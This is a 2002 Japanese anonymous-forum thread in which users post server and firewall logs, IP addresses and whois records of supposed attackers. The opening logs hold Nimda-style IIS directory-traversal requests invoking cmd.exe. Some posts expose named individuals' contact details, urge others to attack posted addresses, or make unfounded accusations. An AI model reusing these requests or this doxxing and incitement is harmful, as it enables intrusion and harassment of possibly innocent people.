アタッカーのIPを晒す

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
アタッカーのIPを晒してしまうスレ

61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
61.205.115.211 - - [02/Sep/2002:20:25:33 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"

ウザすぎ!!!
2名無しさん@お腹いっぱい。:02/09/02 20:33
( ´_ゝ`)フーン
こいつぁ、事件だぜ!

■■■■■■■■■■■■糸冬 了■■■■■■■■■■■■
5名無しさん@お腹いっぱい。:02/09/02 20:59
>>1
あ、ごめん。。そのIP俺のおかんだわ。
6cheshire-cat ◆CATJR.v6 :02/09/02 21:01
>>1
質問スレなら即レスしたのに。
http://pc.2ch.net/test/read.cgi/sec/1029675971/l50

いとふゆ
7名無しさん@お腹いっぱい。:02/09/02 21:12
61.205.103.31 - - [02/Sep/2002:20:52:46 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:47 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
61.205.103.31 - - [02/Sep/2002:20:52:47 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:49 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
61.205.103.31 - - [02/Sep/2002:20:52:49 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:51 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
61.205.103.31 - - [02/Sep/2002:20:52:51 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:52 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
61.205.103.31 - - [02/Sep/2002:20:52:52 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:54 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322
61.205.103.31 - - [02/Sep/2002:20:52:54 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" "-"
61.205.103.31 - - [02/Sep/2002:20:52:56 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
61.205.103.31 - - [02/Sep/2002:20:52:56 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
>>1
それを晒してなんの意味があるわけ?
しかもわざわざスレまで立てて。
自己満足?
そういうのは脳内だけでやってね
このIPアドレスやばくない?晒していいのかな
■皆さん!ハッカー攻撃どのくらい来ますか?Part2■ http://pc.2ch.net/test/read.cgi/sec/1030548767/l50
クラックしかけてくる奴の国名ランキング(日本除く) http://pc.2ch.net/test/read.cgi/sec/1005488998/l50
【犯罪者予備軍リスト】 ttp://pc.2ch.net/test/read.cgi/sec/1029392996/l50
Packet sent from San Francisco:-) ttp://pc.2ch.net/test/read.cgi/sec/1028461839/l50
11名無しさん@お腹いっぱい。:02/09/03 01:49
アタッカー


晒しあげ
nimdaじゃん
削除依頼済
14名無しさん@お腹いっぱい。:02/09/04 10:22
どこから繋げているかを
どこで調べるの?
218.216.226.25
NTT
16名無しさん@お腹いっぱい。:02/09/04 10:27
中部ケーブルネットワーク株式会社
>>14
1814:02/09/04 10:39
みんなありがとう。
POP3に見知らぬIPがあったので調べてみると
元カノでした(怖
■皆さん!ハッカー攻撃どのくらい来ますか?Part2■
http://pc.2ch.net/test/read.cgi/sec/ 1030548767/l50
クラックしかけてくる奴の国名ランキング(日本除く)
http://pc.2ch.net/test/read.cgi/sec/ 1005488998/l50
【犯罪者予備軍リスト】 ttp://pc.2ch.net/test/read.cgi/sec/1029392996/l50
Packet sent from San Francisco:-)
ttp://pc.2ch.net/test/read.cgi/sec/1028461839/l50

■■■■■■■■■■■■ 終了 ■■■■■■■■■■■■
あたっく〜 あたっく〜 











終わり
21名無しさん@お腹いっぱい。:02/09/08 00:37
IP Address List HostName Aliases

218. 43. 59. 19 p7019-adsao02yokoni-acca.kanagawa.ocn.ne.jp


はいよ
22名無しさん@お腹いっぱい。:02/09/08 00:50
アタックだと勘違いして妄想を書き込むスレはここですか?
http://211.13.205.135
↑ここだ!

サイトまでもってやがる!!
しかも18禁だ!!
・・・ゴメンナサイ。。
IP: 210.197.82.66
DNS: c82066.tctv.ne.jp

IP: 210.197.82.133
DNS: c82133.tctv.ne.jp
n08-170.ip-tokyo.highway.ne.jp 誰?
26名無しさん@お腹いっぱい。:02/09/23 00:52
203.141.136.3

晒しage
寝言は寝てから言うもんだがな???
28名無しさん@お腹いっぱい。:02/09/23 11:09
219.48.212.30に注意!!とろいの木馬さんを送ってきます
>>28
無知は早く氏ね
30_:02/09/23 11:21
早とちりはイカン
31名無しさん@お腹いっぱい。:02/09/23 12:32
192.168.0.1
32名無しさん@お腹いっぱい。:02/09/23 12:52
おまいら
どんなアタックなのかも書き込め。
>>31
ローカルアドレスだけど
34名無しさん@お腹いっぱい。:02/09/25 15:12
Personal Information: [個人情報]
a. [JPNICハンドル] YK7789JP
b. [氏名] 木村 保博
c. [Last, First] Kimura, Yasuhiro
d. [電子メイル] [email protected]
f. [組織名] ファストネット株式会社
g. [Organization] FastNet,Inc.
k. [部署] インターネット事業部 インターネット技術推進部
l. [Division] Internet Technology Promotion Div. Internet Business Group
m. [肩書]
n. [Title]
o. [電話番号] XXXXXXXXXX
p. [FAX番号] XXXXXXXXXX
y. [通知アドレス] [email protected]
[最終更新] 2001/09/14 16:04:53 (JST)
[email protected]


コイツちょこちょこハッキングしてくる。ウザイ。晒す。
35名無しさん@お腹いっぱい。:02/09/25 22:06
>>1の鯖ってさ、クレズとか受け入れちゃったんだね(稿)
管理責任能力が欠如してるんだろう(劇稿)
Apacheのログなんか見せて喜んでるアフォは沈んどけ(晒し上げ)
あげ荒らしが頻発の為、運営側と相談中。
■■■■■■■■終了■■■■■■■■
210.197.83.196, c83196.tctv.ne.jp
38名無しさん@お腹いっぱい。:02/09/26 21:32
\\219.25.26.18\SharedDocs\
39名無しさん@お腹いっぱい。:02/09/29 20:42
踏み台にされてる香具師だっているんだぞ!
晒すな!! キチガイども!
40名無しさん@お腹いっぱい。:02/09/29 20:59
>>1
こういう情報は公開されてます

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.205.113.0-61.205.119.0
b. [ネットワーク名] K-OPTICOM
f. [組織名] 株式会社ケイ・オプティコム
g. [Organization] K-Opticom Corporation
m. [運用責任者] KH4246JP
n. [技術連絡担当者] YI4008JP
p. [ネームサーバ] ns1.eonet.ne.jp
p. [ネームサーバ] ns2.eonet.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/09/26
[最終更新] 2002/02/01 10:07:57 (JST)
[email protected]
41名無しさん@お腹いっぱい。:02/09/29 23:47
217.98.209.11
これは串ですかね?
日付: 2002/09/30 時刻: 21:40:51
アドレス 218.120.90.35 からの不正侵入の試みを規則 Portal of Doom トロイの木馬のデフォルト遮断 によって検出しました。
以降のアクセスを 30 分間遮断しました。
ここ20日ほどうざいので晒しあげ。

Security Violations
=-=-=-=-=-=-=-=-=-=
Sep 30 17:43:04 myhost in.ftpd[11280]: refused connect from 210.3.205.65
Sep 30 17:46:16 myhost in.ftpd[11286]: refused connect from 210.3.205.65
Sep 30 17:47:37 myhost in.ftpd[11292]: refused connect from 210.3.205.65
Sep 30 17:48:06 myhost in.ftpd[11298]: refused connect from 210.3.205.65
Sep 30 17:48:28 myhost in.ftpd[11304]: refused connect from 210.3.205.65
Sep 30 17:48:49 myhost in.ftpd[11310]: refused connect from 210.3.205.65
Sep 30 17:49:08 myhost in.ftpd[11316]: refused connect from 210.3.205.65
Sep 30 17:49:33 myhost in.ftpd[11322]: refused connect from 210.3.205.65
Sep 30 17:50:22 myhost in.ftpd[11330]: refused connect from 210.3.205.65
Sep 30 17:51:15 myhost in.ftpd[11336]: refused connect from 210.3.205.65
Sep 30 17:51:45 myhost in.ftpd[11342]: refused connect from 210.3.205.65
Sep 30 17:52:17 myhost in.ftpd[11348]: refused connect from 210.3.205.65
Sep 30 17:52:47 myhost in.ftpd[11354]: refused connect from 210.3.205.65
途中略
Sep 30 17:55:32 myhost in.ftpd[11384]: refused connect from 210.3.205.65
Sep 30 17:55:58 myhost in.ftpd[11390]: refused connect from 210.3.205.65
Sep 30 17:56:26 myhost in.ftpd[11396]: refused connect from 210.3.205.65
Sep 30 17:56:56 myhost in.ftpd[11402]: refused connect from 210.3.205.65
Sep 30 17:58:20 myhost in.ftpd[11408]: refused connect from 210.3.205.65
Sep 30 17:58:46 myhost in.ftpd[11414]: refused connect from 210.3.205.65
Sep 30 17:59:22 myhost in.ftpd[11420]: refused connect from 210.3.205.65
Sep 30 17:59:54 myhost in.ftpd[11426]: refused connect from 210.3.205.65
Sep 30 18:00:22 myhost in.ftpd[11434]: refused connect from 210.3.205.65
Sep 30 18:00:50 myhost in.ftpd[11440]: refused connect from 210.3.205.65
4443:02/09/30 22:40
今調べたら、ここ踏み台にされてるな。
いつまでもほっとくなよ、管理者。

ftpd,rpc,apache,mod_ssl,php,openssh,cgi どれもだめじゃん。
45名無しさん@お腹いっぱい。:02/10/11 21:12
146.245.2.221
46名無しさん@お腹いっぱい。:02/10/14 00:28
210.156.65.118
47名無しさん@お腹いっぱい。:02/10/14 01:05
127.0.0.2
>>47
ネタ
49名無しさん@お腹いっぱい。:02/10/14 01:48
192.168.0.1
50名無しさん@お腹いっぱい。:02/10/14 02:12
0120.333.333
51名無しさん@お腹いっぱい。:02/10/14 02:17
24.194.183.92
臭ってくんだよ・・
こいつのおかげで部屋がくさい
52名無しさん@お腹いっぱい。:02/10/14 14:43
よくわからんが、
refused connect from [email protected]
とかいうのは、外部からなんかしようとしてるヤツがいる、と考えていいの?
あたっく〜  あたっく〜


はっか〜  こわい〜


IPを〜 さらすぜ〜 IPが〜 わかれば〜 なんでも〜

出来ちゃうんだぞ〜 トロイの木馬を〜 送るんだ〜
>>50
ワラタ
お前天災
55名無しさん@お腹いっぱい。:02/10/14 21:29
152.163.213.238
64.12.128.18
64.12.128.14
205.188.193.229
152.163.207.230
205.188.193.91
205.188.197.106
56名無しさん@お腹いっぱい。:02/10/14 21:33
205.188.198.105
64.12.101.232
64.12.107.104
210.57.155.34
205.188.193.110
207.188.7.80
57名無しさん@お腹いっぱい。:02/10/14 21:36
169.254.159.252
131.234.25.25
202.1.237.109
218.1.64.59
202.103.30.73
61.145.116.138
61.135.129.65
152.163.213.220
130.94.92.107
152.63.53.250
58名無しさん@お腹いっぱい。:02/10/14 21:39
202.188.53.25
205.188.193.92
152.163.213.231
152.63.53.250
152.63.50.193
152.63.55.114
172.16.20.6
59名無しさん@お腹いっぱい。:02/10/15 01:55
台湾とかブラジルとかイタリアとかシンガポールとか
イスラエルとかアメリカとかフランスとかから来るのは
ワールドカップ関連のサイトをサーフィンしたせいかなぁ。
それとマカーにexeとか送るのやめてね?・ウザイから。
60名無しさん@お腹いっぱい。:02/10/15 02:27
姉さん事件です!
61名無しさん@お腹いっぱい。:02/10/15 03:03
211.133.144.18
TCP act packet attack
これは串ですか?
62名無しさん@お腹いっぱい。:02/10/15 03:07
>>61
http://taruo.net/
の診断くんで調べてみたら?
63名無しさん@お腹いっぱい。:02/10/15 04:30
>>62
IPを調べてみたら
株式会社ジンオフィスサービス という会社から
アタックされてることが判明しました。
さらに
61.121.253.63
バリュークリックジャパンというところからも
TCP ack packet attackという攻撃をされた事
がログに残ってました。
企業が個人に攻撃するなんて事はあるんですかね?
64名無しさん@お腹いっぱい。:02/10/15 04:35
>>63
ttp://jbbs.shitaraba.com/sports/901/
ここ↑に沢山居ます☆
なあ、



      な ん で 「 攻 撃 」 な ん だ ?

66名無しさん@お腹いっぱい。:02/10/15 06:25
[回避] 攻撃者は、TCP 接続のハイジャックを試みている可能性があります。
IP: 210.239.44.44
DNS: ss09.estore.co.jp
株式会社イーストアー
http://www.estore.co.jp/
ハイジャックと来ましたか
最近のPFWは語彙が豊かでイイね
その分実際に何が行われたかがきちんと伝えられず、不安を煽られる厨房が多いけど
192.168.0.1
69名無しさん@お腹いっぱい。:02/10/15 08:41
clock.nc.fukuoka-u.ac.jp (133.100.9.2):ntp123

さっき福岡大学からトロイの侵入があった・・・。
70-=-:02/10/15 08:58
>>69
ワロタ
71便利じゃん(w:02/10/15 11:04
>>69
たぶん時計の時刻がハッキングされてるぞ!
72名無しさん@お腹いっぱい。:02/10/15 11:47
経営しているHPに、WEBAUTOというソフトをつかって、ずーっと
アタックして、カウンターCGIに負荷かけていあるアフォが
きました。↓生IPでやっている。

218.218.156.254

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.218.0.0-218.218.255.0
b. [ネットワーク名] ODN
f. [組織名] オープンデータネットワーク(日本テレコム株式会社)
g. [Organization] Open Data Network(JAPAN TELECOM CO.,LTD.)
m. [運用責任者] YN234JP
n. [技術連絡担当者] YN234JP
p. [ネームサーバ] ns1.dhs.jtidc.jp/218.218.247.0
p. [ネームサーバ] ns1.v6.odn.ne.jp/218.218.252.0
p. [ネームサーバ] ns2.dhs.jtidc.jp/218.218.247.0
p. [ネームサーバ] ns2.odn.ne.jp/218.218.0.0-218.218.246.0
p. [ネームサーバ] ns2.odn.ne.jp/218.218.248.0-218.218.251.0
p. [ネームサーバ] ns2.odn.ne.jp/218.218.253.0-218.218.255.0
p. [ネームサーバ] ns2.v6.odn.ne.jp/218.218.252.0
p. [ネームサーバ] ns4.odn.ne.jp/218.218.0.0-218.218.246.0
p. [ネームサーバ] ns4.odn.ne.jp/218.218.248.0-218.218.251.0
p. [ネームサーバ] ns4.odn.ne.jp/218.218.253.0-218.218.255.0
y. [通知アドレス] [email protected]
[割当年月日] 2002/01/22
[最終更新] 2002/08/08 14:50:12 (JST)
[email protected]



73名無しさん@お腹いっぱい。:02/10/15 12:18
昨日晩より頻繁にアタックされるようになりました。
218.232.110.135
210.136.232.249
194.135.19.40
81.23.228.65.
61.121.253.68
今まで一度も無かったのになんだか怖いです・・・
ルーターかましてても駄目なんですかね?
いまだにwhois貼り付けてるバカいるんだな
75名無しさん@お腹いっぱい。:02/10/16 23:11
yahoobb219185148055.bbtec.net
ppp0113.hakata01.bbiq.jp

こいつらうぜえ・・・
特にAhooの香具師。
2時間に200回以上検出されてる。
61.126.200.32
61.25.50.149
いやー、ログみたらお腹いっぱい。
netbus netspy girlfrend、、、
なつかしいトロイの祭り。w
216.87.73.170
78あぼーん:あぼーん
あぼーん
>>78
通報しますた
80名無しさん@お腹いっぱい。:02/10/18 22:08
218-163-174-144.HINET-IP.hinet.net
210.230.244.22

telnet 23 ・・・・・・って、おぃおぃ、IP打ち間違えたか?
82 ◆BonkFKHXWw :02/10/19 11:08
お初です。
一連のスレッドがありますた。
白血病と果敢に闘い、無念にも亡くなった2ちゃんねらのスレです。

医者ってさ・・・
http://ton.2ch.net/hosp/kako/1014/10141/1014187303.html
無菌の国のナディア
http://page.freett.com/dat2ch/021010-1016126461.html
(わしの作った電波2ちゃんのスナップショット)
http://dempa.2ch.net/dat/2002/10/hosp-1016126461.html

何故なのか、彼のHPのBBSが荒らされています。
http://www.eurus.dti.ne.jp/~yoyoyo/

投稿者 残念だったなLEONHARD  投稿日 19 Oct 2002 08:51:27
投稿者 残念だったなLEONHARD  投稿日 19 Oct 2002 08:51:21
投稿者 残念だったなLEONHARD  投稿日 19 Oct 2002 08:51:16
投稿者 残念だったなLEONHARD  投稿日 19 Oct 2002 08:51:11
投稿者 残念だったなLEONHARD  投稿日 19 Oct 2002 08:51:05
投稿者 残念だったなLEONHARD  投稿日 19 Oct 2002 08:51:00

これの羅列です。ご親族も見ておられるのに・・・
こちらにお邪魔するのは初めてです。おまけにスレ違いかもしれません。
しかし、苦しい治療に耐えて耐えてそのあげく死んでしまった>>1にはむごすぎる仕打ちです。
できましたら、この荒らしやさんのIP晒してください。
責任や民法・刑事的罰は全て私が受けます。
また、もし、ここではスレ違いでしたら、申し訳ないのですが、適切なスレに誘導下さい。
83 ◆BonkFKHXWw :02/10/19 11:47
>>82の書き込みの者です。
先程は>>1への感情が先走って、お願い事をしてしまいました。
掲示板の方は荒らしている方を非難するつもりはなく前向きにいこうと言うことでした。
ご迷惑をおかけして申し訳ありませんでした。
84 ◆BonkFKHXWw :02/10/19 18:26
ただ、私個人としては、復讐などするつもりはありません。
”誰がやったのか”が知りたいだけなのです。
>>◆BonkFKHXWw

BBSの方を拝見させて頂きましたが、管理者権限で投稿者のIP、ホストを表示出来るタイプのBBSの様ですので。

ご遺族の方々と協力さえすれば、荒しをした方の(その当時の)IPは判明するかと思われます。
しかし、IPが判ったからといって、その個人を特定出来るとは限りませんので、その辺りをご理解頂けます様、お願い致します。

また、このスレはアタッカー(クラックor特定の攻撃意図を持った者)のIPを晒すスレですので、今後は別スレでお願いします。

86こいつ しつこい:02/10/19 22:38
inetnum: 66.0.0.0 - 66.255.255.255
netname: IANA-NETBLOCK-66
country: AU
address: see http://www.iana.org.
e-mail: [email protected]

87 ◆BonkFKHXWw :02/10/19 23:24
>>85さん、
ありがとうございました。
ただ、ダウソ板初めてのものなので、
>後は別スレで
といわれてもどこにいけばいいかわかりましぇん(泣)
ご迷惑ついでに、誘導おながいします。
88名無しさん@お腹いっぱい。 :02/10/20 00:40
80.11.164.118
YahooBB219185016097.bbtec.net
xdsl027171.061200.metallic.ne.jp
90名無しさん@お腹いっぱい。:02/10/20 12:52
147.208.171.140

こいつから、150以上のアタックをされています。こいつは、創価学会員です。あいつらは、本当にやり口が汚いよ。
あなたが検索されたIPアドレス[ 147.208.171.140 ]の企業名・団体名は以下の通りです。
Intel Corporation INTEL-FSO (NET-147-208-0-0-1)
147.208.0.0 - 147.208.255.255
Symantec Corporation SYMANTEC-INTELONLINE (NET-147-208-171-128-1)
147.208.171.128 - 147.208.171.191
92名無しさん@お腹いっぱい。:02/10/20 15:31
Domain servers in listed order:

DNS03.BBTEC.NET 43.224.255.3
DNS04.BBTEC.NET 43.224.255.4
DNS06.BBTEC.NET 43.231.251.96


93名無しさん@お腹いっぱい。:02/10/20 16:05
うざい!
OrgName: ChungNam National University
OrgID: CNU

NetRange: 168.188.0.0 - 168.188.255.255
CIDR: 168.188.0.0/16
NetName: CHUNGNAM
NetHandle: NET-168-188-0-0-1
Parent: NET-168-0-0-0-0
NetType: Direct Assignment
NameServer: BAEKMA.CHUNGNAM.AC.KR
NameServer: NS.KREN.NM.KR
Comment:
RegDate: 1994-06-07
Updated: 1996-05-03

TechHandle: HK283-ARIN
TechName: Kisun, Han
TechPhone: +82-42-821-6055
TechEmail: [email protected]


>>93
Whois貼り付けんな、ボケ
95名無しさん@お腹いっぱい。:02/10/20 16:10
>>94
黙れカス!
(´-`).。oO(まだWhois貼り付けて喜ぶヤシいるんだ…)
(´-`).。oO(大体踏み台かもしれないのに・・・・・)
サーバのport23(telnet)にずーっと攻撃かけてくるこのヴァカは誰だ?
12.249.18.25[12-249-18-25.client.attbi.com]

…っておい、AT&Tかよ (@_@)?!!
99名無しさん@お腹いっぱい。:02/10/21 02:31
YahooBB218141016006.bbtec.net
多分踏み台なんだろうけどなぁ・・・
100
頻繁にノートンが警告してきます。
なんなのでしょうか?

202.248.20.208

来る日も来る日もNetBIOS〜〜
IP晒すにしても多すぎて無理〜〜♪
dns30.bbtec.net(218.176.253.82)

ページ移動するたびに出てくるんで気持ち悪いです。
104名無しさん@お腹いっぱい。:02/10/22 02:02
200.64.172.123
212.30.93.79
18.11.95.172
213.169.247.76
64.125.31.82.

>>103
お前YahooBBユーザーだろ(w
106名無しさん@お腹いっぱい。:02/10/22 12:31
Whoisってなんですか?

>>106
駄目な例
・検索という言葉を知らない。
108これなんですか?どこですか?:02/10/22 14:17
リモートアドレス:KFZFXOAKWEL3QDZ(192.168.0.3):3987
ローカルアドレス:KFZFXOAKWEL3QDZ(192.168.0.3):ssdp
>>108
お前のパソコンのローカルアドレス
今日の
ウイルスバスター2002 ログ リスト
種類,時刻,受信/送信,プロトコル,送信元IPアドレス,送信元ポート,送信先IPアドレス,送信先ポート,説明
ファイアウォール,14:49:50,受信,ICMP,211.14.14.126,N/A,192.168.0.2,N/A,Smurf,
ファイアウォール,14:49:55,受信,ICMP,210.153.89.246,N/A,192.168.0.2,N/A,Smurf,
ファイアウォール,14:49:58,受信,ICMP,211.14.12.11,N/A,192.168.0.2,N/A,Smurf,

10/19日の
ウイルスバスター2002 ログ リスト
種類,時刻,受信/送信,プロトコル,送信元IPアドレス,送信元ポート,送信先IPアドレス,送信先ポート,説明
クローキング,01:14:39,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
クローキング,01:14:49,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
クローキング,01:14:49,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
クローキング,01:14:54,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
クローキング,01:14:55,受信,UDP,210.81.153.192,5000,192.168.0.2,5000,Cloaking,
(以下略

これ何?
うおおーーーっ!!
ファイヤーウォールのパワーを全開だ!!

俺のPCを不正アクセスから守ってくれっ!!!
112極悪不正アクセス野郎:02/10/22 23:03
ローカルアドレス、 サービスは 211.132.156.217,nbsession(139)
誰か攻撃してやって下さい
role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail: [email protected]
admin-c: SN108-AP
tech-c: KS218-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed: [email protected] 19990629
changed: [email protected] 20011011
changed: [email protected] 20021018
source: APNIC

inetnum: 211.132.128.0 - 211.132.159.255
netname: XEPHION
descr: XePhion(NTT-ME Corporation)
country: JP
















んだから、Whois貼るアホは帰れと、(以下略)
なんつーか、
IPアドレスから(中略)できるよーな人たちには冗長な情報なんじゃなかろーか、
とか思ったりは…しないんだろうな。
たぶん
「自分だけがこの方法を知っている!」
「IPだけじゃなく個人情報も2chに晒してる!」
と思ってたりするんだろう。
115名無しさん@お腹いっぱい。:02/10/23 05:14
24.167.17.57
116名無しさん@お腹いっぱい。:02/10/23 07:05
195.7.124.3

Ping Attackウザイ
>>112
つーか、不正アクセスじゃないだろ?
118名無しさん@お腹いっぱい。:02/10/23 20:19
211.114.52.123,3799 侵入野郎
person: Heesung Yang
descr: Pongsu Primary School
descr: 284-438 KAJEONG2DONG SEOKU
descr: INCHON
descr: 404-232
country: KR
phone: +82-32-567-0282
fax-no: +82-32-567-0284
e-mail: [email protected]
nic-hdl: HY536-KR
>>118





>>113が難(むず)しくて読(よ)めないのか?

んだから、Whois(ふーいず)貼(は)るアホ(あほ)は帰(かえ)れと、(以下略(いかりゃく))
120鬼畜米英此レ皆死スヘシ:02/10/26 11:30
webmail.sonepar-us.com
121名無しさん@お腹いっぱい。:02/10/26 12:01
>>120を晒しage
122ヤレ!:02/10/26 13:04
210.136.232.250
ad.jp.ap.valuecommerce.com

ウザ過ぎ、このインチキ会社やってくれ。
>>122
そんなとこ許可しているお前がアホ。
この板的にはFWでin,out共にブロック。
>>122










アタッカーの意味を分かって言ってるのかと(以下略
125名無しさん@お腹いっぱい。:02/10/26 18:21
イタイ白人野郎>>121を皿仕上げ
126名無しさん@お腹いっぱい。:02/10/26 20:48
こいつを逆にアタクしてやりたい。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.207.0.0-61.207.255.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [運用責任者] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp/61.207.56.0-61.207.255.0
p. [ネームサーバ] ns-kn001.ocn.ad.jp/61.207.56.0-61.207.255.0
p. [ネームサーバ] ns-os001.ocn.ad.jp/61.207.0.0-61.207.37.0
p. [ネームサーバ] ns-os001.ocn.ad.jp/61.207.42.0-61.207.55.0
p. [ネームサーバ] ns-tkb01.ocn.ad.jp/61.207.38.0-61.207.41.0
p. [ネームサーバ] ns-tkb02.ocn.ad.jp/61.207.38.0-61.207.41.0
p. [ネームサーバ] pns.ocn.ad.jp/61.207.0.0-61.207.37.0
p. [ネームサーバ] pns.ocn.ad.jp/61.207.42.0-61.207.55.0
y. [通知アドレス] [email protected]
[割当年月日] 2001/05/08
[最終更新] 2002/01/28 10:53:02 (JST)
[email protected]
>>126
一つ聞きますけど、
それの意味分かってます?
>>127
絨毯爆撃でもする気なんでは。いやー勇者だねー。
129名無しさん@お腹いっぱい。:02/10/26 22:48
218.158.93.101
から攻撃を受けますタ。韓国であるます。
あっそ
>>130
いえ、阿蘇ではございません。韓国であるます。
くっそ
フッ素
157.206.3.109通信の要求2002/10/27 9:09:18TCP(4054)
65.213.187.99通信の要求2002/10/27 9:07:03TCP(4049)
216.32.210.138通信の要求2002/10/27 9:01:10TCP(4088)
217.8.96.171通信の要求2002/10/27 8:59:59TCP(4069)
61.156.45.47通信の要求2002/10/27 8:57:35TCP(4090)
66.40.9.137通信の要求2002/10/27 8:57:03TCP(4084)
66.230.128.22通信の要求2002/10/27 8:56:57TCP(4081)
64.186.142.55通信の要求2002/10/27 8:56:46TCP(4029)

ついさっきからこいつらに激しく通信の要求されまくってる。
いやいやこまったね。
135名無しさん@お腹いっぱい。:02/10/27 20:10
時間, イベント, 侵入者, カウント
2002/10/27 20:03:03, SubSeven port probe, 250.a.005.mel.iprimus.net.au, 3
2002/10/27 19:32:02, SubSeven port probe, sxpp-p-144-139-125-33.prem.tmns.net.au, 3
2002/10/27 19:19:05, SubSeven port probe, c17098.dandn1.vic.optusnet.com.au, 3
2002/10/27 18:55:33, Telnet port probe, 211.93.133.66, 2
2002/10/27 18:13:22, SubSeven port probe, d161-ps3-mel.alphalink.com.au, 3
2002/10/27 17:23:31, MSRPC UDP port probe, Toronto-ppp274573.sympatico.ca, 1
2002/10/27 17:13:19, SMTP port probe, 211.230.36.131, 3
2002/10/27 16:45:57, SQL port probe, adsl-64-175-194-18.dsl.lsan03.pacbell.net, 3
2002/10/27 16:21:40, FTP port probe, 211.105.32.230, 1
2002/10/27 15:02:17, SubSeven port probe, c17000.brodm1.vic.optusnet.com.au, 3
2002/10/27 13:49:33, Telnet port probe, 211.93.133.66, 2
2002/10/27 12:34:03, RPC TCP port probe, 0x50c63795.kd4nxx10.adsl-dhcp.tele.dk, 4
